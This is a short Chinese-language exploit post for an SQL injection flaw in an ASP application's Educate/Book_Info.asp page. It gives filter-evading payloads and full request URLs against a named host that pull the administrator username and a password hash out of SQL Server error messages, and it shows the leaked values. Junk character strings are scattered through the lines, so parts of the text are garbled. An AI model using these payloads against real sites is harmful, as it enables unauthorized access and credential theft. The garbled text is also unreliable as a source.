漏洞出现在Educate/Book_Info.asp
6 L( V% u4 X' f' X此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
4 O4 w7 ^) w/ d& @exp:如下, v7 f1 F$ R4 C+ s
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)( k+ v1 i: D" d U: B
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
+ F: |0 K" c6 d1 r* s' nhttp://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
0 r4 u- f+ }$ Z: H9 _) n! z! _Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
* j4 ]$ e; T: z) w( d ]2 D. D将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。6 Y* c: l: U: V8 K: c
/Educate/Book_Info.asp,行 84 X) Y5 O( ^( z; Z
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
: B( s _( `7 c$ P: uMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'8 C' {! C: L' {4 E- b
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。+ F5 [$ F1 X7 v8 W* ~8 w% j$ ?
/Educate/Book_Info.asp,行 8 |